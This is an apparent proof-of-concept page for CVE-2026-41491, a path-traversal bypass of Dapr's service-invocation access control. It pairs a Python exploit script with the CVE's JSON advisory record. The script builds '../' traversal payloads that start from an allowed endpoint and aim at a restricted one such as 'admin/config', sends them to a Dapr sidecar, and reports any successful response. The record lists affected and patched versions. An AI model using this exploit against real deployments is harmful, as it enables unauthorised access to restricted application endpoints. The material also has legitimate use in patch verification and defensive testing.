CVE-2026-41491

# PoC for CVE-2026-41491: Dapr Access Control Bypass via Path Traversal # This script demonstrates a potential exploit using path normalization differences. import requests def exploit_poc(target_host, app_id, allowed_path, restricted_path): """ Attempts to bypass ACL by prepending an allowed path to a traversal sequence. """ # The payload tries to access 'restricted_path' by traversing back from 'allowed_path' # Example: /public/../../admin/sensitive_data payload = f"{allowed_path}/../{restricted_path}" url = f"http://{target_host}/v1.0/invoke/{app_id}/method/{payload}" headers = { "Content-Type": "application/json" } try: print(f"[*] Sending payload to: {url}") response = requests.get(url, headers=headers) if response.status_code == 200: print("[+] Potential Bypass Successful! Received 200 OK.") print(f"[+] Response Body: {response.text[:200]}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Configuration TARGET = "dapr-sidecar-ip:3500" TARGET_APP_ID = "vulnerable-app" # Assume /health is allowed by ACL, and /admin/config is restricted ALLOWED_ENDPOINT = "health" RESTRICTED_ENDPOINT = "admin/config" exploit_poc(TARGET, TARGET_APP_ID, ALLOWED_ENDPOINT, RESTRICTED_ENDPOINT)

{"cve": {"id": "CVE-2026-41491", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:33.407", "lastModified": "2026-05-08T16:08:15.570", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. From versions 1.3.0 to before 1.15.14, 1.16.0-rc.1 to before 1.16.14, and 1.17.0-rc.1 to before 1.17.5, a vulnerability has been found in Dapr that allows bypassing access control policies for service invocation using reserved URL characters and path traversal sequences in method paths. The ACL normalized the method path independently from the dispatch layer, so the ACL evaluated one path while the target application received a different one. This issue has been patched in versions 1.15.14, 1.16.14, and 1.17.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/dapr/dapr/pull/9589", "source": "[email protected]"}, {"url": "https://github.com/dapr/dapr/security/advisories/GHSA-85gx-3qv6-4463", "source": "[email protected]"}]}}